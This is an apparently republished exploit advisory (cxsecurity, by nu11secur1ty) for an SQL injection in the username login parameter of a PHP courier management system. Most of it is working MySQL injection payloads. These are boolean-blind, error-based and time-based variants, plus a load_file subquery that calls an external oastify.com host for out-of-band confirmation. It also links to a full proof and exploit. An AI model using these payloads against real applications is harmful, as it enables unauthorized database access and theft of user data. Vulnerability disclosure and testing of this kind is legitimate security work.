TENANT-LIMITED-1.0 SQLi
2024-5-23 05:19:31 Author: cxsecurity.com(查看原文) 阅读量:4 收藏

## Titles: TENANT-LIMITED-1.0 SQLi ## Author: nu11secur1ty ## Date: 05/20/2024 ## Vendor: https://mayurik.com/ ## Software: https://www.sourcecodester.com/php/17375/best-courier-management-system-project-php.html ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The username parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\h7pme8qbgdftj9mizgk6u4aj0a63uuill9dw3ks.oastify.com\\lmh'))+' was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Exploits: - SQLi Multiple: ```mysql --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=nlWcgulD'+(select load_file('\\\\h7pme8qbgdftj9mizgk6u4aj0a63uuill9dw3ks.oastify.com\\lmh'))+'' OR NOT 7856=7856 OR 'qylg'='WmKA&password=q7L!w3j!P7 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: username=nlWcgulD'+(select load_file('\\\\h7pme8qbgdftj9mizgk6u4aj0a63uuill9dw3ks.oastify.com\\lmh'))+'' AND (SELECT 5737 FROM(SELECT COUNT(*),CONCAT(0x716a767071,(SELECT (ELT(5737=5737,1))),0x7171786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) OR 'bruW'='pbdw&password=q7L!w3j!P7 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=nlWcgulD'+(select load_file('\\\\h7pme8qbgdftj9mizgk6u4aj0a63uuill9dw3ks.oastify.com\\lmh'))+'' AND (SELECT 4762 FROM (SELECT(SLEEP(7)))iyAW) OR 'ryQj'='epQU&password=q7L!w3j!P7 --- ``` ## Reproduce: [href](https://www.patreon.com/posts/tenant-limited-1-104585030) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/05/tenant-limited-10-sqli.html) ## Time spent: 00:39:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024050067
如有侵权请联系:admin#unsafe.sh